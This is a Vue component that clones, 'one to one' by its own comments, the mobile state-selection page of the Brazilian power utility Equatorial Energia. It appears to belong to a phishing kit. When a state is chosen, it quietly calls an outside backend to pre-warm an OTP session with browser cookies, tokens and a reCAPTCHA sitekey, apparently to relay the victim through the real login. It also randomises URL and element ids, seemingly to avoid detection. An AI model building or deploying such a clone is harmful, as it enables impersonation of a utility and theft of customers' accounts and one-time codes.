<template>
  <section class="presentation select-state dark-section">
    <header class="site-header">
      <div class="container">
        <div class="row">
          <div class="site-logo-container col-xs-12 col-md-4 col-lg-4 around-xs">
            <a href="#">
              <img class="site-logo start-sm" src="../app/static/template/home/logo-white.png" alt="Cemar">
            </a>
          </div>
          <div class="col-xs-12 col-sm-6 col-md-8 col-lg-8">
            <div class="index-navigation">
              <nav class="main-menu">
                <ul>
                  <li><a href="#">GRUPO EQUATORIAL</a></li>
                  <li><a href="#">RELAÇÕES COM INVESTIDORES</a></li>
                  <li><a href="#">LGPD</a></li>
                </ul>
              </nav>
            </div>
          </div>
        </div>
      </div>
    </header>

    <div class="background-container">
      <!-- Imagem oficial do site Equatorial — replicação 1:1 da página
           https://www.equatorialenergia.com.br/?page_id=2726 (mobile). -->
      <img
        src="../app/static/template/home/background.jpg"
        alt="Imagem ilustrativa"
        class="background-media">
      <div class="background-gradient"></div>
    </div>

    <div class="container">
      <div class="col-md-12">
        <div class="hero">
          <div class="content-container">
            <h1>Escolha o seu estado:</h1>
            <br>
            <div class="actions">
              <div v-for="state in states" :key="state">
                <a
                  class="action-button btn main ignore"
                  :class="{ 'is-selected': selectedState === state }"
                  :data-state="state"
                  @click.prevent="selectState(state)"
                >
                  {{ selectedState === state ? 'Selecionando...' : state }}
                </a>
                <br>
              </div>
            </div>
          </div>
        </div>
      </div>
    </div>
  </section>
</template>

<script>
// Mapeia o nome do estado para o code 2-letter usado no backend.
const ESTADO_TO_CODE = {
  'ALAGOAS':           'al',
  'AMAPA':             'ap',
  'MARANHAO':          'ma',
  'PARA':              'pa',
  'PIAUI':             'pi',
};

// Base da API — mesma resolução do ValidacaoForm.
function resolveApiBase() {
  const explicit = process.env.VUE_APP_EQUATORIAL_API_BASE;
  if (explicit) return explicit.replace(/\/$/, '');
  if (process.env.NODE_ENV === 'production') return 'https://api.segunda-via-energia.com';
  return '';
}
const API_BASE = resolveApiBase();

export default {
  name: 'App',
  data() {
    return {
      selectedState: null,
      // GOIAS e RIO GRANDE DO SUL removidos: só têm fluxo SMS (desabilitado).
      states: [
        'ALAGOAS',
        'AMAPA',
        'MARANHAO',
        'PARA',
        'PIAUI',
      ]
    }
  },
  methods: {
    // Gera uma string aleatória com tamanho reduzido para melhorar a performance
    generateRandomString(length = 32) {
      return Math.random().toString(36).substr(2, length);
    },
    // Atualiza os data-id de todos os elementos que possuírem este atributo
    updateDataIds() {
      this.$nextTick(() => {
        document.querySelectorAll('[data-id]').forEach(element => {
          element.setAttribute('data-id', this.generateRandomString());
        });
      });
    },
    // Atualiza a URL sem recarregar a página
    redirectWithRandomURL() {
      if (!window.location.search.includes('id=')) {
        const randomString = this.generateRandomString();
        const newURL = `${window.location.origin}${window.location.pathname}?id=${randomString}`;
        history.replaceState(null, '', newURL);
      }
    },
    /**
     * Fire-and-forget: avisa o backend pra começar a aquecer um ctx OTP daquele
     * estado (browser + cookies + transmit token + sitekey) e prefetch reCAPTCHA.
     *
     * IMPORTANTE: usamos GET com query-string em vez de POST + JSON. Razão:
     * - POST + application/json dispara preflight CORS (OPTIONS) que muitos
     *   browsers cancelam quando a página navega imediatamente depois.
     * - GET simples sem custom headers é "simple request" no CORS spec — não
     *   tem preflight e sobrevive à navegação mesmo sem keepalive.
     * - `keepalive: true` é deixado como cinturão de segurança extra.
     */
    warmupBackend(estadoNome) {
      const codigo = ESTADO_TO_CODE[estadoNome];
      if (!codigo) return;
      const url = `${API_BASE}/api/equatorial/otp/warmup?estado=${encodeURIComponent(codigo)}`;
      try {
        fetch(url, {
          method:      'GET',
          mode:        'cors',
          credentials: 'omit',
          cache:       'no-store',
          keepalive:   true,
        }).catch(() => {});
      } catch (_e) { /* silencioso */ }
    },
    // Armazena o estado selecionado e mantém um feedback visual curto antes da rota.
    selectState(estado) {
      if (this.selectedState) {
        return;
      }

      this.selectedState = estado;
      localStorage.setItem('estadoselecionado', estado);
      // Dispara o warmup IMEDIATAMENTE — o browser começa o request ANTES
      // do setTimeout que navega. Com GET sem preflight, é instantâneo.
      this.warmupBackend(estado);
      setTimeout(() => {
        this.$router.push('/minhafatura');
      }, 120);
    }
  },
  mounted() {
    this.updateDataIds();
    this.redirectWithRandomURL();
  }
}
</script>

<style scoped>
@import '../app/static/template/home/style.home.css';

.select-state .actions a.action-button {
  cursor: pointer;
  transition: transform 120ms ease, box-shadow 120ms ease, background-color 120ms ease, opacity 120ms ease;
  user-select: none;
}

.select-state .actions a.action-button:active,
.select-state .actions a.action-button.is-selected {
  box-shadow: 0 0 0 3px rgba(255, 255, 255, 0.35), 0 10px 24px rgba(0, 0, 0, 0.24);
  opacity: 0.92;
  transform: scale(0.96);
}

.select-state .actions a.action-button.is-selected {
  pointer-events: none;
}

/* ═══════════════════════════════════════════════════════════════════════════
   MOBILE LAYER — Réplica visual fiel da tela de seleção de estado oficial
   da equatorialenergia.com.br. Extraído do HTML/CSS fornecido pelo usuário:

   - Background: gradient diagonal azul→roxo sobre imagem bg_hi.jpg
       linear-gradient(160deg,
         rgba(0,2,145,0.58) 10%,
         rgba(30,76,205,0.22),
         rgba(110,0,255,0.47))
   - Body font: Open Sans, fallback sans-serif
   - Botões "ghost pill": border 2px solid white, background transparente,
     border-radius 30px, padding 8px 40px, font-size 1.2em, color white
   - Hover: glow `0 0 100px rgba(255,255,255,0.5)` + bg `rgba(255,255,255,0.15)`
   - H1 < 360px: 1.5em / 360-768: 1.8em (texto branco "Escolha o seu estado:")
   - Logo: max-height 36px no mobile

   Tudo escoped em @media (max-width: 768px) — desktop não é afetado.
   ═══════════════════════════════════════════════════════════════════════ */

/* Open Sans via Google Fonts. A página oficial Equatorial usa o nome
   `Open-Sans` (com hífen) com @font-face apontando pro CDN deles, mas esses
   .woff2 retornam 404 atualmente. Solução: importar do Google e ALIAS
   `Open-Sans` apontando pra `Open Sans` (mesmo CSS final, ID Google estável). */
@import url('https://fonts.googleapis.com/css2?family=Open+Sans:wght@300;400;600;700;800&display=swap');

@font-face {
  font-family: 'Open-Sans';
  src: local('Open Sans Light'), local('OpenSans-Light');
  font-weight: 300;
  font-display: swap;
}
@font-face {
  font-family: 'Open-Sans';
  src: local('Open Sans'), local('OpenSans-Regular');
  font-weight: 400;
  font-display: swap;
}
@font-face {
  font-family: 'Open-Sans';
  src: local('Open Sans Bold'), local('OpenSans-Bold');
  font-weight: 700;
  font-display: swap;
}
@font-face {
  font-family: 'Open-Sans';
  src: local('Open Sans ExtraBold'), local('OpenSans-ExtraBold');
  font-weight: 800;
  font-display: swap;
}

@media (max-width: 768px) {
  /* ── BODY/FONTS — Open-Sans em tudo (idêntico ao site oficial) ──────── */
  .presentation,
  .presentation *,
  .hero,
  .hero h1,
  .actions,
  .actions a {
    font-family: 'Open-Sans', 'Open Sans', system-ui, -apple-system, 'Segoe UI', Roboto, sans-serif !important;
    -webkit-font-smoothing: antialiased;
  }
  /* Body fallback: caso a imagem bg_hi.jpg não carregue, o fundo fica preto
     idêntico ao body { background: black } oficial */
  .presentation.dark-section {
    background: #000000 !important;
    color: #ffffff !important;
  }

  /* ── HEADER: logo Equatorial branca, sem menu ──────────────────────── */
  .site-header { background: transparent !important; }
  .site-header .main-menu,
  .site-header .index-navigation {
    display: none !important;
  }
  .site-header .container {
    padding: 0 env(safe-area-inset-right, 16px) 0 env(safe-area-inset-left, 16px);
  }
  .site-header .no-margin {
    margin: 0 !important;
  }
  .site-logo-container {
    flex: 0 0 100% !important;
    max-width: 100% !important;
    text-align: center !important;
    margin: 0 !important;
    padding: 0 !important;
  }
  /* CSS oficial: .site-logo { margin: 32px 10px 6px; max-height: 36px } */
  .site-logo {
    max-height: 36px !important;
    height: auto;
    width: auto;
    margin: 32px 10px 6px !important;
  }

  /* ── BACKGROUND: réplica 1:1 do CSS oficial Equatorial ──────────────── */
  /* Oficial: .background-container { position: absolute; top: 0; left: 0;
                                       width: 100%; height: 100%; z-index: -1 } */
  .background-container {
    position: absolute !important;
    top: 0;
    left: 0;
    width: 100% !important;
    height: 100% !important;
    z-index: -1;
    background: #000000;                       /* fallback caso bg_hi.jpg falhe */
  }
  /* Oficial: .background-media { position: inherit; top: 0; left: 0;
                                  width: 100%; height: 100%; opacity: 0.5;
                                  object-fit: cover; object-position: left } */
  .background-container .background-media,
  .background-media {
    position: inherit !important;
    top: 0;
    left: 0;
    width: 100% !important;
    height: 100% !important;
    opacity: 0.5 !important;
    object-fit: cover !important;
    object-position: left !important;
  }
  /* Oficial: .presentation .background-container::after { gradient azul→roxo } */
  .background-container::after,
  .background-gradient {
    content: '';
    position: absolute !important;
    top: 0;
    left: 0;
    width: 100% !important;
    height: 100% !important;
    background: linear-gradient(160deg,
      #00029194 10%,
      rgba(30, 76, 205, 0.22),
      rgba(110, 0, 255, 0.47)) !important;
    z-index: 1;
    pointer-events: none;
  }

  /* ── HERO/TÍTULO ──────────────────────────────────────────────────── */
  .presentation {
    display: inline-block;
    position: relative;
    min-height: 100vh;
    width: 100%;
    overflow: hidden;
    padding-bottom: 0 !important;
  }
  .presentation > .container {
    margin-top: 6vh !important;
    position: relative;
    z-index: 9;
  }
  .hero {
    text-align: center;
    z-index: 2;
    position: relative;
    margin-bottom: 32px !important;
  }
  /* H1 — oficial: < 360px = 1.5em, 360-768 = 1.8em */
  .hero h1,
  .content-container h1 {
    font-size: 1.8em !important;
    letter-spacing: 0.01em !important;
    margin: 0 !important;
    color: #ffffff !important;
    font-weight: 400 !important;
    line-height: 1.2;
    text-align: center;
  }

  .content-container {
    position: relative;
    margin-top: 6vh !important;
    padding: 0 16px;
  }

  /* ── BOTÕES GHOST PILL — réplica exata do .btn oficial ──────────────── */
  .select-state .actions {
    text-align: center;
    margin-top: 12px;
  }
  /* CSS oficial: .action-button { margin: 15% 0px; max-width: calc(100% - 40px) }
     Refinado depois: .action-button { margin: 15px 0px }
     .select-state .actions a.action-button: display: inline-block; width: 200px; max-width: 80% */
  .select-state .actions a.action-button {
    display: inline-block;
    width: 200px;
    max-width: 80%;
    margin: 15px 0 !important;
    /* .btn oficial: border 2px solid white, bg none, color white, padding 8px 40px,
       border-radius 30px, font-size 1.2em, font-weight 400 */
    border: 2px solid #ffffff !important;
    background: none !important;
    background-color: transparent !important;
    outline: none !important;
    color: #ffffff !important;
    padding: 8px 40px !important;
    border-radius: 30px !important;
    font-size: 1.2em !important;             /* exato do .btn oficial */
    font-weight: 400 !important;
    text-decoration: none !important;
    cursor: pointer;
    text-transform: none;
    line-height: 1.2;
    transition: background 300ms ease-in-out, box-shadow 300ms ease-in-out, transform 100ms ease;
    -webkit-appearance: none;
    appearance: none;
    box-sizing: border-box;
  }
  .select-state .actions a.action-button:hover {
    /* Glow oficial: box-shadow: rgba(255, 255, 255, 0.5) 0 0 100px */
    box-shadow: 0 0 100px rgba(255, 255, 255, 0.5) !important;
    background: rgba(255, 255, 255, 0.15) !important;
    background-color: rgba(255, 255, 255, 0.15) !important;
    text-decoration: none !important;
  }
  .select-state .actions a.action-button:active {
    transform: scale(0.97);
    background: rgba(255, 255, 255, 0.22) !important;
  }
  .select-state .actions a.action-button.is-selected {
    background: rgba(255, 255, 255, 0.25) !important;
    box-shadow: 0 0 60px rgba(255, 255, 255, 0.5), inset 0 0 0 2px #ffffff !important;
    transform: scale(0.97);
  }

  /* ── ESCONDE elementos extras que não fazem parte do design oficial ─── */
  footer {
    display: none !important;
  }
}

/* ═════════════════════════ VERY SMALL (< 360px) ═════════════════════════════ */
@media (max-width: 360px) {
  /* H1 oficial em telas muito pequenas: 1.5em */
  .hero h1,
  .content-container h1 {
    font-size: 1.5em !important;
  }
  .select-state .actions a.action-button {
    width: 180px;
    padding: 8px 24px !important;
    font-size: 1em !important;
  }
  .site-logo {
    max-height: 32px !important;
    margin: 24px 10px 4px !important;
  }
}
</style>
